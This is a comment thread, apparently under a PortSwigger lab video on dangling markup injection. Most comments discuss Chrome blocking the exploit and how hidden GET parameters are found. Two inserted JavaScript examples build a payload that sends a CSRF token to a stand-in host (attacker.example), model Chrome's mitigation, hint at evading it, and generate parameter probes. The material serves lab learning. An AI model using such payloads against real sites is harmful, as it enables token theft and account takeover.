I don't understand why only 480 people have watched this masterpiece explanation 🎉🎉🎉🎉
Loved it, sir.
You explained my favourite bug type so efficiently.
I was disappointed when I did not find your explanation in the PortSwigger lab and was ready to skip it altogether because I did not understand a thing, but fortunately I searched a bit and was thrilled to find your amazing videos 🥰😍
Thank you very much for your kindness and amazing explanation 👍
Whoa! The explanation was amazing, thank you for sharing your knowledge, bro.
Very good job. Definitely worth watching.
Great explanation, brother. Helpful for a beginner to understand easily.
This lab cannot be solved this way anymore; they patched it, using the URL of the lab as a replacement for Burp. Very sad. Thanks for the video anyway, I learned a lot :)
It can be solved, try to escape.
@@jesusgavancho9170 How?
@@jesusgavancho9170 It appears the robot user won't click on the bait if the href URL targets the exploit server; did you get around that?
Thanks, I was losing my mind until I found this comment lol
Thank you for your explanation!!!
Stealing the CSRF token didn't work? Something was changed in this lab.
Yes, I am able to grab my own CSRF token (wiener) from the exploit server's access logs, but I can't see the victim's CSRF token when I deliver the exploit to the victim. The lab is not doing the simulation thing anymore.
The victim is using Google Chrome, so dangling markup injection won't work; in Firefox it works. I did it another way, escaping. @@nishantdalvi9470
@@nishantdalvi9470 same issue here
I have the same problem 😢
@@hichamzouhri395 Yep, I did a one-click version with JS that works great on my own user, but as near as I can tell the robot user never clicks on the "Click". I suspect that anything that isn't an official Collaborator URL is getting blocked once the user has the initial page. OK, fine, they're a business.
As always, your videos are a gem.
Thank you, sir.
Thank you so much ❤
There's another lab related to CSP that has been added on PortSwigger, please solve that lab too.
At the time of your recording that lab hadn't been added, but now it's added, please solve it.
Please, sir, can you check if this exploit is still working on the latest Chrome version? Because it doesn't seem to work on Chrome, but the same exploit works for me on Firefox.
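The comments above report that the dangling markup payload works in Firefox but not in Chrome. The following is an added example, not code from the video or from the PortSwigger lab, that simulates what happens: a constructed page with a hypothetical attacker host (attacker.example), an emulation of how the HTML parser treats an unclosed `src="` attribute, and a simplified version of Chrome's dangling-markup mitigation (a resource URL containing both a raw newline and `<` is never requested). It also shows what the request would look like in the exploit server's access log where no block applies, and how to pull the token back out of it.

```javascript
// Added example: simulates a dangling-markup injection and the Chrome mitigation that the
// comments above describe. Not code from the video or from the PortSwigger lab. The page,
// the CSRF token and the attacker host (attacker.example) are constructed for illustration.

const ATTACKER = "https://attacker.example/log?"; // hypothetical logging endpoint

// Constructed victim page. The reflected search term is followed by a form whose attributes
// are unquoted, so an unclosed src="... swallows the CSRF token before the next double quote.
function buildPage(reflected) {
  return [
    "<html><body>",
    "<p>Results for: " + reflected + "</p>",
    "<form action=/my-account/change-email method=POST>",
    "<input type=hidden name=csrf value=constructed-csrf-token-123>",
    '<input type=email name=email placeholder="you@example.com">',
    "</form></body></html>",
  ].join("\n");
}

// Emulates the HTML parser's handling of a double-quoted attribute that is never closed:
// the value runs from the opening quote to the next '"' in the document (or to end of input).
function danglingSrcValue(html, payload) {
  const at = html.indexOf(payload);
  if (at < 0) return null;
  const valueStart = at + payload.indexOf('src="') + 5; // index just past the opening quote
  const end = html.indexOf('"', valueStart);
  return html.slice(valueStart, end === -1 ? html.length : end);
}

// Chrome's dangling-markup mitigation, simplified: a resource URL that contains both a raw
// newline and a '<' is never requested. Firefox applies no such rule, which is why the
// same payload works there.
function blockedByChrome(rawUrl) {
  return /[\r\n]/.test(rawUrl) && rawUrl.includes("<");
}

// Where no block applies, the URL parser strips raw newlines and percent-encodes '<', '>'
// and spaces before the request goes out. This is the request line the exploit server's
// access log would show.
function loggedRequestUrl(rawUrl) {
  return new URL(rawUrl).href;
}

// Pull the token back out of the logged request, as you would when reading the access log.
function tokenFromLoggedUrl(loggedUrl) {
  const query = decodeURIComponent(new URL(loggedUrl).search);
  const m = query.match(/name=csrf value=([^>\s]+)/);
  return m ? m[1] : null;
}

function runSimulation() {
  const payload = '<img src="' + ATTACKER; // no closing quote: the markup dangles
  const html = buildPage(payload);
  const rawUrl = danglingSrcValue(html, payload);
  const logged = loggedRequestUrl(rawUrl);
  return {
    rawUrl,
    chromeBlocked: blockedByChrome(rawUrl),
    logged,
    token: tokenFromLoggedUrl(logged),
  };
}

const result = runSimulation();
console.log(result.chromeBlocked
  ? "Chrome: raw newline + '<' in the URL, request is never sent"
  : "Chrome: request would be sent");
console.log("Firefox access-log line would be:", result.logged);
console.log("token recoverable from the log:", result.token);
```

The rule in `blockedByChrome` is applied to the attribute value as it appears in the markup, before URL parsing removes the newlines; that is why a token sitting after a line break on the page is enough to trip it, and why a one-line page (or a different injection primitive) is what the "escaping" replies are hinting at.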
same here
I like your video
8:20 Can it be used for an open redirect vuln?
How do you know GET has the hidden parameter email?
It's a good question. I don't see a reason why we are supposed to know that.
My guess is that PortSwigger is encouraging trying out some logical GET parameters even if a site doesn't appear to be using them.
The URL has the id parameter, so that's a clue it might take others too; it's a hard problem to strike a balance between "expert" level labs vs. focusing on the core issue without weighing down the exercise with material covered in previous labs.
I want to discuss the issue of hidden parameters, which is often mentioned in many fuzz bounty articles. However, I have not encountered this in practice, except in target practice. A normal website usually has hundreds of API interfaces and parameters. Even if we collect all the parameters and conduct fuzz testing on all interfaces, it would still be a significant workload. I'm not sure how much time others spend on exploring a single website when they are bounty hunting, but my patience only allows me to spend 2 to 3 hours on a website. This includes directory exploration, understanding the site's logic and functionality, as well as fuzzing and port scanning. @@mikeyfinn2
In general, any form input element with a name should be tested as a URL parameter.
Doing it your way without Burp Collaborator, when clicking the "click me" link on the exploit server it says "invalid host".
And when I try the solution's way, delivering the exploit via the exploit server and Collaborator, I don't get any DNS or HTTP interactions in the Collaborator menu.
Does anybody know any solutions? :)
Please ignore my language mistakes.
The exploit is not working on Chrome anymore, which is weird because the victim is using Chrome. I tried on Firefox and the exploit works for me, but on the victim it is not working.
@@youssef-kz3yn Very kind of you to consider my comment ❤️
@@amaljose6374 You are welcome, my friend; if you find any solution please bring me back here.
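The "how do you know about email?" question and the answer above amount to a procedure: take the names of the form controls a page renders and try each one as a GET parameter on the page's URL. The following is an added example, not code from the video or the lab, that does exactly that. The sample page and the lab-style host (lab.example) are constructed; the canary value is just a string unlikely to appear on its own, so that a reflection in the response stands out.

```javascript
// Added example: turn the form field names on a page into candidate GET parameters, the
// check the comment above suggests. Not code from the video or the lab; the sample page
// and the lab-style URL (lab.example) are constructed.

// Constructed page resembling an account page: id is visible in the URL, the other
// parameter names (search, csrf, email) exist only as form controls.
const SAMPLE_HTML = `
<form class=search action=/ method=GET>
  <input type=text name=search placeholder="Search...">
</form>
<h1>My Account</h1>
<form action="/my-account/change-email" method="POST">
  <input type="hidden" name="csrf" value="constructed-csrf-token-123">
  <input type="email" name='email' required>
  <button type="submit">Update email</button>
</form>
`;

// Collect every name= attribute on form controls, whether quoted with ", ', or unquoted.
function formFieldNames(html) {
  const names = new Set();
  const re = /<(?:input|select|textarea|button)\b[^>]*?\sname\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    names.add(m[1] ?? m[2] ?? m[3]);
  }
  return [...names];
}

// Build one probe URL per candidate, keeping the parameters the page already uses (id=...)
// so the server takes the same code path, and tagging each with a canary that names the
// parameter, so a reflection tells you which one was picked up.
function candidateUrls(pageUrl, names, canary = "canary7781") {
  return names.map((name) => {
    const u = new URL(pageUrl);
    u.searchParams.set(name, canary + "-" + name);
    return u.href;
  });
}

// The check to run on each response: a GET parameter the page never advertised is worth
// a closer look when its canary shows up in the body or in a hidden field.
function reflectsCanary(body, canary) {
  return body.includes(canary);
}

const names = formFieldNames(SAMPLE_HTML);
const probes = candidateUrls("https://lab.example/my-account?id=wiener", names);
console.log(names);  // ["search", "csrf", "email"]
console.log(probes); // one URL per name, e.g. https://lab.example/my-account?id=wiener&email=canary7781-email
```

Run the probes with whatever client you already use for the lab and feed each response body to `reflectsCanary` with the matching canary; a hit on a name the page only uses in a POST form is the "hidden GET parameter" the thread is asking about.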
Has anybody been able to solve this lab recently?
Bro, idk but I think you exposed your public IP in the video.